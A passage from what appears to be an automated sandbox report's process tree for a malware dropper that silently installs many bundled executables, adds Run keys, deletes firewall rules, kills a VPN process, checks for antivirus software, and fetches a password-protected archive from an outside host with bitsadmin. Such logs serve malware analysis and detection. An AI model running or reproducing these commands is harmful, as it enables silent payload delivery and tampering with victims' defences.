        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:7204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
        15⤵
        
        PID:3628
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
        16⤵
        
        PID:5384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:6348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:7784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:7996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:5980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:6664
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        15⤵
        
        PID:2016
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\khjyxiaa.j3y\GcleanerWW.exe /mixone & exit
        13⤵
        
        PID:7652
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe subid=685 /verysilent & exit
        13⤵
        
        PID:8300
        
        C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe subid=685 /verysilent
        14⤵
        
        PID:8748
        
        C:\Users\Admin\AppData\Local\Temp\is-HA8LS.tmp\libravpn_setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HA8LS.tmp\libravpn_setup.tmp" /SL5="$1095C,11382886,1080320,C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe" subid=685 /verysilent
        15⤵
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5168
        
        C:\Program Files (x86)\LibraVPN\LibraVPN.exe
        
        "C:\Program Files (x86)\LibraVPN\LibraVPN.exe"
        16⤵
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:6796
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
        17⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
        18⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
        19⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND
        17⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND
        18⤵
        Suspicious use of SetThreadContext
        
        PID:6576
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND
        19⤵
        
        PID:9160
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND
        17⤵
        
        PID:8684
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        
        PID:9016
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND
        18⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND
        19⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND
        17⤵
        
        PID:9016
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:9108
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        
        PID:4064
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND
        18⤵
        
        PID:4356
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND
        19⤵
        
        PID:8992
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND
        17⤵
        
        PID:4256
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:9188
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        
        PID:7988
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND
        18⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND
        19⤵
        
        PID:6460
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
        17⤵
        
        PID:7452
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        
        PID:8580
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
        18⤵
        
        PID:6672
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
        19⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound
        17⤵
        
        PID:8796
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        
        PID:7540
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c netsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound
        18⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound
        19⤵
        
        PID:8800
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c chcp 65001 > nul & cmd.exe /c ipconfig /flushdns
        17⤵
        
        PID:8716
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        
        PID:7876
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c ipconfig /flushdns
        18⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /flushdns
        19⤵
        Gathers network information
        
        PID:6400
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c taskkill /f /im wireguard.exe
        17⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im wireguard.exe
        18⤵
        Kills process with taskkill
        
        PID:8772
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh wlan show interfaces > openvpn\dat\tmp_check_WiFi.dat
        17⤵
        
        PID:8612
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        
        PID:8524
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6796 -s 1692
        17⤵
        Program crash
        
        PID:6528
        
        C:\Program Files (x86)\Data Finder\Versium Research\app.exe
        
        "C:\Program Files (x86)\Data Finder\Versium Research\app.exe"
        9⤵
        
        PID:2184
        
        C:\Program Files (x86)\Data Finder\Versium Research\app.exe
        
        "C:\Program Files (x86)\Data Finder\Versium Research\app.exe"
        10⤵
        Modifies data under HKEY_USERS
        
        PID:6468
        
        C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
        9⤵
        
        PID:5420
        
        C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a
        10⤵
        
        PID:2100
        
        C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
        9⤵
        
        PID:6336
        
        C:\Users\Admin\AppData\Local\Temp\is-QV5OL.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QV5OL.tmp\LabPicV3.tmp" /SL5="$30566,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
        10⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\is-76I3R.tmp\12(((((.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-76I3R.tmp\12(((((.exe" /S /UID=lab214
        11⤵
        Drops file in Drivers directory
        Adds Run key to start application
        Drops file in Program Files directory
        
        PID:6220
        
        C:\Program Files\Common Files\KLOTBEAUID\prolab.exe
        
        "C:\Program Files\Common Files\KLOTBEAUID\prolab.exe" /VERYSILENT
        12⤵
        
        PID:7464
        
        C:\Users\Admin\AppData\Local\Temp\is-QL72N.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QL72N.tmp\prolab.tmp" /SL5="$505A4,575243,216576,C:\Program Files\Common Files\KLOTBEAUID\prolab.exe" /VERYSILENT
        13⤵
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:7556
        
        C:\Users\Admin\AppData\Local\Temp\79-01612-9df-7a4a7-34210b1edded5\Tuvuduloxa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\79-01612-9df-7a4a7-34210b1edded5\Tuvuduloxa.exe"
        12⤵
        Checks computer location settings
        
        PID:7520
        
        C:\Users\Admin\AppData\Local\Temp\ff-9508d-e66-22aa0-f5366762714c6\Hyxixanicy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ff-9508d-e66-22aa0-f5366762714c6\Hyxixanicy.exe"
        12⤵
        
        PID:7628
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cwmf3g4l.ika\GcleanerEU.exe /eufive & exit
        13⤵
        
        PID:4308
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4undjfq4.0xu\installer.exe /qn CAMPAIGN="654" & exit
        13⤵
        
        PID:8016
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe /Verysilent /subid=623 & exit
        13⤵
        
        PID:9108
        
        C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe
        
        C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe /Verysilent /subid=623
        14⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\is-POKCV.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-POKCV.tmp\Setup3310.tmp" /SL5="$20452,138429,56832,C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe" /Verysilent /subid=623
        15⤵
        Suspicious use of FindShellTrayWindow
        
        PID:7748
        
        C:\Users\Admin\AppData\Local\Temp\is-J6D3D.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-J6D3D.tmp\Setup.exe" /Verysilent
        16⤵
        Drops file in Program Files directory
        
        PID:8052
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe & exit
        13⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe
        14⤵
        
        PID:8536
        
        C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe" -a
        15⤵
        
        PID:8448
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe & exit
        13⤵
        
        PID:3892
        
        C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe
        14⤵
        Suspicious use of SetThreadContext
        
        PID:8832
        
        C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe
        15⤵
        
        PID:3280
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exe /S & exit
        13⤵
        
        PID:8344
        
        C:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exe /S
        14⤵
        Drops file in Program Files directory
        
        PID:3712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:3892
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:7012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:4124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        Checks for any installed AV software in registry
        
        PID:5152
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
        15⤵
        Download via BitsAdmin
        
        PID:7856
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        15⤵
        Drops file in Program Files directory
        
        PID:8824
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        15⤵
        
        PID:6172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:8940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:4984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:8244
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
        15⤵
        
        PID:8832
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
        16⤵
        Drops file in System32 directory
        
        PID:8820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:7996
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:4124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:8316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:6168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:5520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
        15⤵
        
        PID:6668
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        15⤵
        
        PID:8380
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\50me53sj.iaw\GcleanerWW.exe /mixone & exit
        13⤵
        
        PID:3488
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe /8-2222 & exit
        13⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe /8-2222
        14⤵
        
        PID:6908
        
        C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe" /8-2222
        15⤵
        Modifies data under HKEY_USERS
        
        PID:5728
        
        C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
        9⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\is-QV5OK.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QV5OK.tmp\lylal220.tmp" /SL5="$20590,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
        10⤵
        
        PID:6172
        
        C:\Users\Admin\AppData\Local\Temp\is-O8109.tmp\èeèrgegdè_éçè_)))_.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-O8109.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal220
        11⤵
        
        PID:5536
        
        C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe
        
        "C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe" /VERYSILENT
        12⤵
        
        PID:7700
        
        C:\Users\Admin\AppData\Local\Temp\is-1EBSN.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1EBSN.tmp\irecord.tmp" /SL5="$30550,5808768,66560,C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe" /VERYSILENT
        13⤵
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\cf-c0c77-214-defb3-f954a08ae9144\Bugyponoku.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cf-c0c77-214-defb3-f954a08ae9144\Bugyponoku.exe"
        12⤵
        Checks computer location settings
        
        PID:7732
        
        C:\Users\Admin\AppData\Local\Temp\36-4fbd2-3d5-1d6ab-714269b081753\Maejumyromi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\36-4fbd2-3d5-1d6ab-714269b081753\Maejumyromi.exe"
        12⤵
        
        PID:7808
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wfu0eydc.aw3\GcleanerEU.exe /eufive & exit
        13⤵
        
        PID:7044
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hccycans.1ip\installer.exe /qn CAMPAIGN="654" & exit
        13⤵
        
        PID:8012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe /Verysilent /subid=623 & exit
        13⤵
        
        PID:9012
        
        C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe
        
        C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe /Verysilent /subid=623
        14⤵
        
        PID:9188
        
        C:\Users\Admin\AppData\Local\Temp\is-AIC96.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-AIC96.tmp\Setup3310.tmp" /SL5="$20454,138429,56832,C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe" /Verysilent /subid=623
        15⤵
        Suspicious use of FindShellTrayWindow
        
        PID:744
        
        C:\Users\Admin\AppData\Local\Temp\is-7BCOD.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7BCOD.tmp\Setup.exe" /Verysilent
        16⤵
        
        PID:7024
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe & exit
        13⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe
        14⤵
        
        PID:8512
        
        C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe" -a
        15⤵
        
        PID:8028
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe & exit
        13⤵
        
        PID:5084
        
        C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe
        14⤵
        
        PID:8900
        
        C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe
        15⤵
        Checks SCSI registry key(s)
        
        PID:8356
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exe /S & exit
        13⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exe /S
        14⤵
        Drops file in Program Files directory
        
        PID:7112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:2560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:7660
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:6788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:8536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:3644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
